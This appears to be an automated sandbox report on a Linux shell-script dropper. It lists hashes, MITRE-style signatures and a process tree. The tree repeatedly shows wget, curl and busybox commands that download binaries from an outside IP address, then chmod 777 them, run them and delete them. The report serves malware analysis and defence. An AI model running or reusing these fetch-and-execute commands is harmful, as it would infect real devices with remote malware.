Analysis
-
max time kernel
93s -
max time network
95s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
-
Size
10KB
-
MD5
60db2d3af75facb76e7b26b1e552b902
-
SHA1
ffe87d1aca4128607117b4b3939750176984834c
-
SHA256
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6
-
SHA512
1cf58da38dea71b95213b99089236b11f2f8d85180e3eda12afdd4ff0c3af2c067ffe54c396526178ae292ff8c2a9cc9526f4d2e84af2883ae8e5ccda0d0c05a
-
SSDEEP
192:FaLN9Yb3+USyLey/wkruDzEJ3izEnZN9Yb3cSyLeyZJ:FafUSyLey4guDzEQzEtSyLeyf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 746 chmod 773 chmod 872 chmod 938 chmod 944 chmod 950 chmod 739 chmod 840 chmod 799 chmod 860 chmod 878 chmod 884 chmod 902 chmod 815 chmod 896 chmod 920 chmod 980 chmod 824 chmod 956 chmod 890 chmod 926 chmod 932 chmod 752 chmod 914 chmod 962 chmod 974 chmod 908 chmod 968 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 740 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 747 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 753 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 774 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 801 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 816 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 825 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG 841 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx 862 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 873 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 879 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 885 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 891 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 897 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 903 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 909 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 915 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 921 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 927 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 933 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 939 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 945 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 951 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 957 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 963 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 969 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG 975 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx 981 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx curl File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG curl File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx curl File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG curl File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl
Processes
-
/tmp/91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh/tmp/91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:737
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:745
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:751
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:765
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:795
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:814
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:823
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:835
-
-
/bin/chmodchmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:857
-
-
/bin/chmodchmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:871
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:877
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:883
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:889
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:895
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:901
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:907
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:913
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:919
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:925
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:931
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:937
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:939
-
-
